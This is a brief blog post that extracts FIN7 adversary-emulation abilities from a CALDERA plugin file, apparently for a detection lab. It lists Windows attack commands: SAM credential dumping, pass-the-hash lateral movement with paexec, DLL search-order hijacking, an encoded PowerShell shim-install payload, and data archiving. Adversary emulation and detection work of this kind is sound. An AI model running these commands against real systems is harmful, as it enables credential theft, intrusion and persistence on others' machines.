Post

Adversary: FIN7

Posted
By Oscar Llerena
2 min read
Adversary: FIN7

Sequence of actions

1
2

┌──(caldera-env)(attacker㉿kali)-[~/…/caldera/plugins/emu/data]
└─$ jq '.[] | select(.adversary == "FIN7")' commands-output.json

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115

{
  "adversary": "FIN7",
  "abilities": [
    {
      "ability_id": "eac2cf0f-7b51-44d2-83cb-57a34a29b7ff",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe C:\\\\Users\\\\#{domain.admin.username}.#{domain}\\\\AppData\\\\Local\\\\takeScreenshot.ps1\n"
      },
      "privilege": "Unknown",
      "tactic": "collection",
      "technique": "Screen Capture",
      "attack_id": "T1113"
    },
    {
      "ability_id": "82d2f5c7-7561-4d91-96d2-959473b9ad2b",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe -ExecutionPolicy Bypass -NoExit -File C:\\\\Users\\\\#{domain.admin.username}.#{domain}\\\\AppData\\\\Local\\\\stager.ps1\"\n"
      },
      "privilege": "Unknown",
      "tactic": "execution",
      "technique": "Command and Scripting Interpreter - Windows Command Shell",
      "attack_id": "T1059.003"
    },
    {
      "ability_id": "ab937ef4-7c66-4349-ad3b-658c41fcf4c5",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe -c \"ps\"\n"
      },
      "privilege": "Unknown",
      "tactic": "discovery/execution",
      "technique": "Process Discovery",
      "attack_id": "T1057"
    },
    {
      "ability_id": "b15d3014-a5d1-4ec6-934b-d7fe44451192",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe -ExecutionPolicy Bypass -NoExit -File \"C:\\\\Users\\\\#{domain.admin.username}.#{domain}\\\\AppData\\\\Local\\\\uac-samcats.ps1\"\n"
      },
      "privilege": "Unknown",
      "tactic": "os-credential-dumping",
      "technique": "OS Credential Dumping: Security Account Manager",
      "attack_id": "T1003.002"
    },
    {
      "ability_id": "9a76889c-9518-4b3e-9c87-6618156015c6",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "cmd.exe /c \".\\paexec.exe \\\\#{itadmin.ip.address} -s -u #{domain}\\#{domain.admin.username} -p #{domain.admin.hash} -c -csrc \\\".\\hollow.exe\\\" hollow.exe\"\n"
      },
      "privilege": "Unknown",
      "tactic": "lateral-movement",
      "technique": "Lateral Tool Transfer",
      "attack_id": "T1570"
    },
    {
      "ability_id": "ab48e12f-def0-40a4-b3d9-ad958f45202a",
      "platform": "windows",
      "commands": {
        "cmd": "robocopy BOOSTWRITE.dll C:\\\\Windows\\\\Syswow64\\\\srrstr.dll &&\ncmd.exe /c \"C:\\\\Windows\\\\Syswow64\\\\SystemPropertiesAdvanced.exe\"\n"
      },
      "privilege": "Unknown",
      "tactic": "hijack-execution-flow---dll-search-order-hijacking",
      "technique": "Hijack Execution Flow - DLL Search Order Hijacking",
      "attack_id": "T1574.001"
    },
    {
      "ability_id": "eb99abcb-93e2-4a3e-bf05-a484839dc851",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe -noprofile -encodedCommand \"JABkAGwAbAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAiAFwAXAB0AHMAYwBsAGkAZQBuAHQAXABYAFwAYgBpAG4AMwAyADkALgB0AG0AcAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAEQAUgBNAFwAIgAgAC0ATgBhAG0AZQAgACIANAAiACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAQgBpAG4AYQByAHkAIAAtAFYAYQBsAHUAZQAgACQAZABsAGwAIAAtAEYAbwByAGMAZQA7ACAAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABkAGwAbAAzADIAOQAuAGQAbABsACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgAgAC0ARgBvAHIAYwBlADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAiACAALQBGAG8AcgBjAGUAOwAgACAAJgAgAHMAZABiAGkAbgBzAHQALgBlAHgAZQAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgA7AA==\"\n"
      },
      "privilege": "Unknown",
      "tactic": "defense-evasion",
      "technique": "Obfuscated Files or Information",
      "attack_id": "T1027"
    },
    {
      "ability_id": "6ec6561b-e535-4fe3-9c20-a52e5982b513",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "powershell.exe -c \"restart-computer -force\"\n"
      },
      "privilege": "Unknown",
      "tactic": "persistence",
      "technique": "Application Shimming",
      "attack_id": "T1546.011"
    },
    {
      "ability_id": "d04a02e1-a05c-46f8-adf0-c036266fe0a1",
      "platform": "windows",
      "commands": {
        "psh,pwsh": "Move-Item pillowMint.exe debug.exe;\n.\\debug.exe;\n"
      },
      "privilege": "Unknown",
      "tactic": "discovery",
      "technique": "Process Discovery",
      "attack_id": "T1057"
    },
    {
      "ability_id": "89b84389-036e-4c3d-a490-bf8ba50bffe8",
      "platform": "windows",
      "commands": {
        "psh,pwsh": ".\\7za.exe a log log.txt;\n"
      },
      "privilege": "Unknown",
      "tactic": "exfiltration",
      "technique": "Archive Collected Data: Archive via Utility",
      "attack_id": "T1560.001"
    }
  ]
}

Windows Commands extracted

1
2
3
4
5
6
7
8
9
10
11
12

powershell.exe C:\\Users\\#{domain.admin.username}.#{domain}\\AppData\\Local\\takeScreenshot.ps1
powershell.exe -ExecutionPolicy Bypass -NoExit -File C:\\Users\\#{domain.admin.username}.#{domain}\\AppData\\Local\\stager.ps1"
powershell.exe -c "ps"
powershell.exe -ExecutionPolicy Bypass -NoExit -File "C:\\Users\\#{domain.admin.username}.#{domain}\\AppData\\Local\\uac-samcats.ps1"
cmd.exe /c ".\paexec.exe \\#{itadmin.ip.address} -s -u #{domain}\#{domain.admin.username} -p #{domain.admin.hash} -c -csrc \".\hollow.exe\" hollow.exe"
robocopy BOOSTWRITE.dll C:\\Windows\\Syswow64\\srrstr.dll &&
cmd.exe /c "C:\\Windows\\Syswow64\\SystemPropertiesAdvanced.exe"
powershell.exe -noprofile -encodedCommand "JABkAGwAbAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAiAFwAXAB0AHMAYwBsAGkAZQBuAHQAXABYAFwAYgBpAG4AMwAyADkALgB0AG0AcAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAEQAUgBNAFwAIgAgAC0ATgBhAG0AZQAgACIANAAiACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAQgBpAG4AYQByAHkAIAAtAFYAYQBsAHUAZQAgACQAZABsAGwAIAAtAEYAbwByAGMAZQA7ACAAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABkAGwAbAAzADIAOQAuAGQAbABsACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgAgAC0ARgBvAHIAYwBlADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAXABcAHQAcwBjAGwAaQBlAG4AdABcAFgAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAiACAALQBGAG8AcgBjAGUAOwAgACAAJgAgAHMAZABiAGkAbgBzAHQALgBlAHgAZQAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGQAYgBFADMANwA2AC4AdABtAHAAIgA7AA=="
powershell.exe -c "restart-computer -force"
Move-Item pillowMint.exe debug.exe;
.\debug.exe;
.\7za.exe a log log.txt;
Virtualbox, Elasticsearch, Fleet
research networking
This post is licensed under CC BY 4.0 by the author.